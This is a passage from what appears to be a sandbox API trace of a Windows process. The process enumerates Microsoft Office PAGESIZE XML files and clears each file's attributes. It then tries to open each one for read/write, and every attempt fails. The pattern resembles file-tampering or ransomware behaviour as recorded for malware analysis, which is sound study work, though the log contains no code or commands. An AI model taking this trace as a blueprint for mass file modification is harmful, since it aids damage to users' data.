| out: lpFindFileData=0x29aca90) returned 1 [0137.567] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.567] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL087.XML", dwFileAttributes=0x80) returned 0 [0137.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL087.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl087.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.568] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.568] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.568] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.568] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.568] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL089.XML", dwFileAttributes=0x80) returned 0 [0137.568] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL089.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl089.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.568] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.568] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.568] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.568] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.569] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL090.XML", dwFileAttributes=0x80) returned 0 [0137.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL090.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl090.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.569] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.569] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.569] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.569] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.569] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL092.XML", dwFileAttributes=0x80) returned 0 [0137.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL092.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl092.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.569] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.569] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.569] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.569] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.570] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL093.XML", dwFileAttributes=0x80) returned 0 [0137.570] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL093.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl093.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.570] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.570] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.571] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.571] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.571] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL095.XML", dwFileAttributes=0x80) returned 0 [0137.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL095.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl095.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.571] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.571] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.571] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.571] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.571] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL096.XML", dwFileAttributes=0x80) returned 0 [0137.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL096.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl096.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.571] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.572] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.572] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.572] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.572] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL097.XML", dwFileAttributes=0x80) returned 0 [0137.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL097.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl097.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.572] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.572] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.572] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.572] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.572] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL102.XML", dwFileAttributes=0x80) returned 0 [0137.573] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL102.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl102.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.573] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.573] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.573] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.573] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.573] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL103.XML", dwFileAttributes=0x80) returned 0 [0137.573] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL103.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl103.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.573] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.573] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.573] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.573] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.574] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL104.XML", dwFileAttributes=0x80) returned 0 [0137.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL104.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl104.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.574] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.574] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.574] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.574] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.575] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL105.XML", dwFileAttributes=0x80) returned 0 [0137.575] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL105.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl105.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.575] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.575] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.575] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.575] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.575] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL106.XML", dwFileAttributes=0x80) returned 0 [0137.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL106.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl106.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.576] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.576] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.576] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.576] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.576] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL107.XML", dwFileAttributes=0x80) returned 0 [0137.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL107.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl107.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.577] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.577] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.578] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.578] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.578] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL108.XML", dwFileAttributes=0x80) returned 0 [0137.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL108.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl108.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.578] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.578] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.578] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.578] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.578] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL109.XML", dwFileAttributes=0x80) returned 0 [0137.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL109.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl109.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.579] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.579] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.579] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.579] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.579] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL110.XML", dwFileAttributes=0x80) returned 0 [0137.579] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL110.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl110.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.579] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.579] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.579] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.579] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.579] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL111.XML", dwFileAttributes=0x80) returned 0 [0137.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL111.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl111.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.580] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.580] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.580] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.580] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.580] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN001.XML", dwFileAttributes=0x80) returned 0 [0137.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN001.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn001.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.580] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.580] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.580] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.580] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.581] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN002.XML", dwFileAttributes=0x80) returned 0 [0137.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN002.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn002.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.581] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.581] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.581] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.581] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.582] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN010.XML", dwFileAttributes=0x80) returned 0 [0137.582] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN010.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn010.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.582] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.582] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.582] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.582] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.582] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN011.XML", dwFileAttributes=0x80) returned 0 [0137.582] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN011.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn011.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.582] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.582] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.583] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.583] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.583] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN020.XML", dwFileAttributes=0x80) returned 0 [0137.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN020.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn020.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.583] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.583] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.584] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.584] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.584] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN022.XML", dwFileAttributes=0x80) returned 0 [0137.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN022.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn022.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.584] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.584] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.584] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.584] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.584] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN026.XML", dwFileAttributes=0x80) returned 0 [0137.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN026.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn026.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.585] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.585] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.585] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.585] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.585] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN027.XML", dwFileAttributes=0x80) returned 0 [0137.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN027.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn027.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.585] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.585] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.585] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.585] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.585] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN044.XML", dwFileAttributes=0x80) returned 0 [0137.586] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN044.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn044.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.586] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.586] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.586] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.586] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.586] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN048.XML", dwFileAttributes=0x80) returned 0 [0137.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN048.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn048.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.587] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.587] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.587] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.587] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.587] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN054.XML", dwFileAttributes=0x80) returned 0 [0137.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN054.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn054.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.587] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.587] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.587] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.587] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.588] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN058.XML", dwFileAttributes=0x80) returned 0 [0137.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN058.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn058.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.588] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.588] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.588] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 